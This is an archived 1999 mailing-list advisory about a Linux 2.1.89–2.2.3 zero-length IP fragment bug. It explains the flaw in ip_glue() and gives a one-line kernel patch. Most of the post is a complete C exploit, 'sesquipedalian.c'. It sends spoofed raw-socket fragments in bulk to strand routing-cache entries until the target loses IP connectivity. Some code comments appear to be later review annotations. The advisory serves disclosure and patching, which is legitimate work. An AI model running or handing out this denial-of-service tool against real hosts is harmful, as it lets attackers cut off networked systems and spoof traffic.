DoS for Linux 2.1.89 - 2.2.3: 0 length fragment bug

From: John McDonald (jmcdonalat_private)
Date: Wed Mar 24 1999 - 20:19:37 PST

  • Next message: Aleph One: "Adminitrivia"

    Hi,
    
    The recent release of the Linux 2.2.4 kernel fixed a remote denial of
    service problem in the IP fragment handling code. If you are running a
    Linux kernel between 2.1.89 and 2.2.3, it would probably be a good idea to
    get the latest version. In case that isn't feasible for you, I've included
    a patch in this post. The impact of this problem is that a remote attacker
    can effectively disable a target's IP connectivity. However, for the
    attack to succeed, the attacker will have to deliver several thousand
    packets to the target, which can take up to several minutes. A quick
    exploit and the patch are appended to the end of this post.
    
    The problem starts in ip_glue() in ip_fragment.c:
    
    	/* Copy the data portions of all fragments into the new buffer. */
    	fp = qp->fragments;
    	count = qp->ihlen;
    	while(fp) {
    		if ((fp->len < 0) || ((count + fp->len) > skb->len))
    			goto out_invalid;
    		memcpy((ptr + fp->offset), fp->ptr, fp->len);
    		if (count == qp->ihlen) {
    			skb->dst = dst_clone(fp->skb->dst);
    			skb->dev = fp->skb->dev;
    		}
    		count += fp->len;
    		fp = fp->next;
    	}
    
    The problem in this code is that if you can get a fragment into the
    qp->fragments list that has a length of 0, and is the first fragment in the
    list, then the call to dst_clone() will happen an extra time. The first time
    through the loop, count will necessarily equal qp->ihlen, causing
    dst_clone() to be called. However, if fp->len happens to equal 0, then count
    += fp->len won't increase it, and the next time through the loop, count will
    still equal qp->ihlen. dst_clone() increments a usage count on an element in
    the routing cache. Our 0 length fragment will cause this element in the
    cache to become stranded. The kernel will not free it when it does the
    garbage collection of the cache because it will think it is currently in
    use.
    
    The other component of the problem is that the call to allocate a new entry
    in the routing cache does a check to see if the hashtable that comprises the
    cache is at a saturated state. If it is, it proceeds to do a garbage
    collection. If the number of entries in the cache, after this garbage
    collection, is still higher than the threshold, then dst_alloc() will fail.
    So, if we generate enough stranded entries in the routing cache (4096 in
    2.2.3) via our malicious frags, then all further calls to dst_alloc will
    fail.
    
    We can get a 0 length fragment into the head of the list by doing the
    following:
    
    Send a fragment at offset 0, with a length of X, and IP_MF set. This creates
    our list.
    
    Send a 0 length fragment at offset 0, where the ip header length is equal to
    the ip total length, and IP_MF is set. This will be treated as coming before
    the fragment already in our list, because it has an offset equal to the
    offset of the existing fragment. It doesn't overlap anything, because its
    end is equal to the following fragment's offset.
    
    Send a fragment at offset X, with IP_MF not set. This will mark the end of
    our set of fragments. ip_done() will return true because it will see the
    first frag going from 0 to 0, the second going from 0 to X, and the third
    going from X to the end. Our fragments will get passed into ip_glue().
    
    -horizon
    
    Here is the patch:
    
    --- linux-2.2.3/net/ipv4/ip_fragment.c  Wed Mar 24 22:48:26 1999
    +++ linux/net/ipv4/ip_fragment.c        Wed Mar 24 22:44:24 1999
    @@ -17,6 +17,7 @@
      *             xxxx            :       Overlapfrag bug.
      *             Ultima          :       ip_expire() kernel panic.
      *             Bill Hawes      :       Frag accounting and evictor fixes.
    + *             John McDonald   :       0 length frag bug.
      */
    
     #include <linux/types.h>
    @@ -357,7 +358,7 @@
            fp = qp->fragments;
            count = qp->ihlen;
            while(fp) {
    -               if ((fp->len < 0) || ((count + fp->len) > skb->len))
    +               if ((fp->len <= 0) || ((count + fp->len) > skb->len))
                            goto out_invalid;
                    memcpy((ptr + fp->offset), fp->ptr, fp->len);
                    if (count == qp->ihlen) {
    
    And here is the exploit:
    
    /*
     * sesquipedalian.c - Demonstrates a DoS bug in Linux 2.1.89 - 2.2.3
     *
     * by horizon <jmcdonalat_private>
     *
     * This sends a series of IP fragments such that a 0 length fragment is first
     * in the fragment list. This causes a reference count on the cached routing
     * information for that packet's originator to be incremented one extra time.
     * This makes it impossible for the kernel to deallocate the destination entry
     * and remove it from the cache.
     *
     * If we send enough fragments such that there are at least 4096 stranded
     * dst cache entries, then the target machine will no longer be able to
     * allocate new cache entries, and IP communication will be effectively
     * disabled. You will need to set the delay such that packets are not being
     * dropped, and you will probably need to let the program run for a few
     * minutes to have the full effect. This was written for OpenBSD and Linux.
     *
     * Thanks to vacuum, colonwq, duke, rclocal, sygma, and antilove for testing.
     */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <time.h>
    #include <unistd.h>
    #include <netinet/in.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <arpa/inet.h>
    
    /*
     * IPv4 header without options, laid out field-for-field as it is written
     * into the packet buffer. The struct must be exactly 20 bytes because
     * IHLEN (its sizeof) is used both as the header length and as the offset
     * of the payload.
     *
     * The address fields are `unsigned int` rather than `unsigned long`:
     * on LP64 platforms `unsigned long` is 8 bytes, which would grow the
     * struct to 32 bytes and corrupt the header layout.
     *
     * NOTE(review): declaring ip_hl before ip_v assumes the compiler allocates
     * bit-fields starting at the least significant bits (as on little-endian
     * x86 ABIs) -- confirm before building on a big-endian host.
     */
    struct my_ip_header
    {
    	unsigned char  ip_hl:4,         /* header length, in 32-bit words */
    		ip_v:4;               /* version */
    	unsigned char  ip_tos;          /* type of service */
    	unsigned short ip_len;          /* total length */
    	unsigned short ip_id;           /* identification */
    	unsigned short ip_off;          /* fragment offset field */
    #define IP_RF 0x8000                    /* reserved fragment flag */
    #define IP_DF 0x4000                    /* dont fragment flag */
    #define IP_MF 0x2000                    /* more fragments flag */
    #define IP_OFFMASK 0x1fff               /* mask for fragmenting bits */
    	unsigned char  ip_ttl;          /* time to live */
    	unsigned char  ip_p;                    /* protocol */
    	unsigned short ip_sum;          /* checksum */
    	unsigned int   ip_src, ip_dst;  /* source and dest address (32 bits each) */
    };
    
    /*
     * UDP header: four 16-bit fields. In this file it is overlaid on the
     * packet buffer immediately after the IP header.
     */
    struct my_udp_header
    {
    	unsigned short uh_sport;	/* source port */
    	unsigned short uh_dport;	/* destination port */
    	unsigned short uh_ulen;		/* UDP length field */
    	unsigned short uh_sum;		/* UDP checksum field */
    };
    
    /* Sizes, in bytes, of the locally declared IP and UDP header structs. */
    #define IHLEN (sizeof (struct my_ip_header))
    #define UHLEN (sizeof (struct my_udp_header))
    
    /*
     * Number of additional bytes handed to sendto() for the header-only
     * fragment: 8 when compiled on OpenBSD, 0 everywhere else.
     * NOTE(review): presumably works around a minimum-size requirement for
     * raw sends on OpenBSD -- the reason is not stated in this file; confirm.
     */
    #ifdef __OpenBSD__
    #define EXTRA 8
    #else
    #define EXTRA 0
    #endif
    
    /*
     * Compute the 16-bit one's-complement Internet checksum of a buffer.
     *
     * data   - start of the buffer, accessed as 16-bit words
     * length - number of bytes to cover; may be odd
     *
     * Returns the bitwise complement of the folded one's-complement sum,
     * expressed in the same byte order as the words read from `data`, so the
     * result can be stored straight back into the buffer.
     *
     * An odd trailing byte is treated as if it were followed by a zero pad
     * byte, and only that single byte is read from memory.
     */
    unsigned short checksum(unsigned short *data,unsigned short length)
    {
            unsigned long sum = 0;          /* must start at zero */
            unsigned short words = length >> 1;
            unsigned short i;
    
            for (i = 0; i < words; i++)
                    sum += data[i];
    
            if (length & 1) {
                    /* Build the final word from the last byte plus a zero
                       pad byte without reading past the end of the data. */
                    unsigned short tail = 0;
    
                    *(unsigned char *)&tail = *(const unsigned char *)&data[words];
                    sum += tail;
            }
    
            /* Fold carries until the sum fits in 16 bits; one pass is not
               always enough because the fold itself can carry. */
            while (sum >> 16)
                    sum = (sum & 0xffff) + (sum >> 16);
    
            return (unsigned short)(~sum & 0xffff);
    }
    
    /*
     * Turn a dotted-quad string or a host name into an IPv4 address.
     *
     * hostname - text to parse; tried first with inet_addr(), and looked up
     *            with gethostbyname() only if that fails
     *
     * Returns the 32-bit address in network byte order, widened to
     * unsigned long. Prints a message to stderr and exits with status 1 when
     * the name cannot be resolved to an IPv4 address.
     *
     * The inet_addr() result is kept in an in_addr_t and compared against
     * INADDR_NONE: storing it in a `long` and comparing with -1 never matches
     * where long is 64 bits wide, so the lookup fallback would be skipped.
     */
    unsigned long resolve( char *hostname)
    {
    	in_addr_t addr;
    	struct hostent *hp;
    
    	addr = inet_addr(hostname);
    	if (addr == INADDR_NONE)
    	{
    		hp = gethostbyname(hostname);
    		if (hp == NULL || hp->h_addrtype != AF_INET ||
    		    hp->h_length != (int)sizeof(addr) ||
    		    hp->h_addr_list[0] == NULL)
    		{
    			fprintf(stderr,"Can't resolve target.\n");
    			exit(1);
    		}
    		/* copy exactly the four address bytes, independent of the
    		   width or byte order of the return type */
    		memcpy(&addr,hp->h_addr_list[0],sizeof(addr));
    	}
    	return (unsigned long)addr;
    }
    
    /* Write the command-line synopsis to stderr, then terminate with status 0. */
    void usage(void)
    {
    	static const char synopsis[] =
    		"usage: ./sqpd [-s sport] [-d dport] [-n count] [-u delay] source target\n";
    
    	fputs(synopsis, stderr);
    	exit(0);
    }
    
    
    /*
     * Build three IP fragments that share one randomly chosen IP id and send
     * them, in order, with sendto() on socket `s`.
     *
     * s      - socket descriptor used for every sendto() call
     * source - value stored in the IP source-address field
     * dest   - value stored in the IP destination-address field and used as
     *          the sendto() destination address
     * sport  - UDP source port (host byte order; converted with htons())
     * dport  - UDP destination port (host byte order; converted with htons())
     *
     * All three packets are built in one static buffer; only ip_len, ip_off
     * and ip_sum change between sends. Any sendto() failure is reported with
     * perror() and terminates the process with status 1.
     */
    void sendem(int s, unsigned long source, unsigned long dest,
    		unsigned short sport, unsigned short dport)
    {
    	static char buffer[8192];
    	struct my_ip_header *ip;
    	struct my_udp_header *udp;
    	struct sockaddr_in sa;
    
    	/* destination socket address handed to sendto() */
    	bzero(&sa,sizeof(struct sockaddr_in));
    	sa.sin_family=AF_INET;
    	sa.sin_port=htons(sport);
    	sa.sin_addr.s_addr=dest;
    
    	/* clear only the part of the buffer that is actually transmitted */
    	bzero(buffer,IHLEN+32);
    	
    	/* overlay the header structs on the buffer: IP first, UDP right after */
    	ip=(struct my_ip_header *)buffer;
    	udp=(struct my_udp_header *)&(buffer[IHLEN]);
    
    	/* header fields that stay the same for all three fragments */
    	ip->ip_v = 4;
    	ip->ip_hl = IHLEN >>2;	/* header length expressed in 32-bit words */
    	ip->ip_tos = 0;
    	ip->ip_id = htons(random() & 0xFFFF);
    	ip->ip_ttl = 142;
    	ip->ip_p = IPPROTO_UDP;
    	ip->ip_src = source;
    	ip->ip_dst = dest;
    	udp->uh_sport = htons(sport);
    	udp->uh_dport = htons(dport);
    	udp->uh_ulen = htons(64-UHLEN);
    	udp->uh_sum = 0;
    
    	/* Our first fragment will have an offset of 0, and be 32 bytes
    	   long. This gets added as the only element in the fragment
    	   list. */
    
    	ip->ip_len = htons(IHLEN+32);
    	ip->ip_off = htons(IP_MF);
    	/* the checksum field must be zero while the checksum is computed */
    	ip->ip_sum = 0;
    	/* NOTE(review): the checksum here covers IHLEN+32 bytes, i.e. header
    	   and payload together -- confirm that this is intended */
    	ip->ip_sum = checksum((u_short *)buffer,IHLEN+32);
    
    	if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
    	{
    		perror("sendto");
    		exit(1);
    	}
    
    	/* Our second fragment will have an offset of 0, and a 0 length.
    	   This gets added to the list before our previous fragment,
    	   making it first in line. */
    
    	ip->ip_len = htons(IHLEN);
    	ip->ip_off = htons(IP_MF);
    	ip->ip_sum = 0;
    	ip->ip_sum = checksum((u_short *)buffer,IHLEN);
    
    	/* ip_len says IHLEN, but IHLEN+EXTRA bytes are passed to sendto() */
    	if (sendto(s,buffer,IHLEN+EXTRA,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
    	{
    		perror("sendto");
    		exit(1);
    	}
    
    	/* Our third and final frag has an offset of 4 (32 bytes), and a
    	   length of 32 bytes. This passes our three frags up to ip_glue. */
    
    	ip->ip_len = htons(IHLEN+32);
    	/* offset field is in 8-byte units; IP_MF is not set on this one */
    	ip->ip_off = htons(32/8);
    	ip->ip_sum = 0;
    	ip->ip_sum = checksum((u_short *)buffer,IHLEN+32);
    
    	if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
    	{
    		perror("sendto");
    		exit(1);
    	}
    }
    
    /*
     * Program entry point.
     *
     * Parses the options -s (source port), -d (destination port), -n (number
     * of iterations) and -u (delay in microseconds), followed by two
     * positional arguments: source and target. Both are passed through
     * resolve(). A raw socket is opened with IP_HDRINCL enabled and sendem()
     * is called `count` times, pausing `delay` microseconds after every
     * second iteration and printing a progress dot every 100 iterations.
     *
     * Returns 0 after completing all iterations. Exits with status 1 if the
     * socket cannot be created or configured; prints the usage text (via
     * usage()) when arguments are missing or an unknown option is given.
     */
    int main(int argc, char **argv)
    {
    	int sock;
    	int on=1,i;
    	unsigned long source, dest;
    	unsigned short sport=53, dport=16384;
    	int delay=20000, count=15000;
    
    	if (argc<3)
    		usage();
    
    	while ((i=getopt(argc,argv,"s:d:n:u:"))!=-1)
    	{
    		switch (i)
    		{
    			case 's': sport=atoi(optarg);
    				  break;
    			case 'd': dport=atoi(optarg);
    				  break;
    			case 'n': count=atoi(optarg);
    				  break;
    			case 'u': delay=atoi(optarg);
    				  break;
    			default:  usage();
    		}
    	}
    
    	argc-=optind;
    	argv+=optind;
    
    	/* Options may have consumed every argument that satisfied the
    	   check above; without both positionals argv[1] would be NULL. */
    	if (argc<2)
    		usage();
    
    	source=resolve(argv[0]);
    	dest=resolve(argv[1]);
    
    	/* seed the generator used by sendem() for the IP id */
    	srandom((unsigned int)(time(NULL)*getpid()));
    
    	if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    	{
    		perror("socket");
    		exit(1);
    	}
    
    	/* we supply the IP header ourselves */
    	if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0)
    	{
    		perror("setsockopt: IP_HDRINCL");
    		exit(1);
    	}
    
    	fprintf(stdout,"\nStarting attack on %s ...",argv[1]);
    
    	for (i=0; i<count; i++)
    	{
    		sendem(sock,source+htonl(i),dest,sport,dport);
    		if (!(i%2))
    			usleep(delay);
    		if (!(i%100))
    		{
    			/* start a new row of dots every 2000 iterations */
    			if (!(i%2000))
    				fprintf(stdout,"\n");
    			fprintf(stdout,".");
    			fflush(stdout);
    		}
    	}
    
    	fprintf(stdout,"\nDone.\n");
    
    	/* normal completion is not an error */
    	return 0;
    }
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:39:33 PDT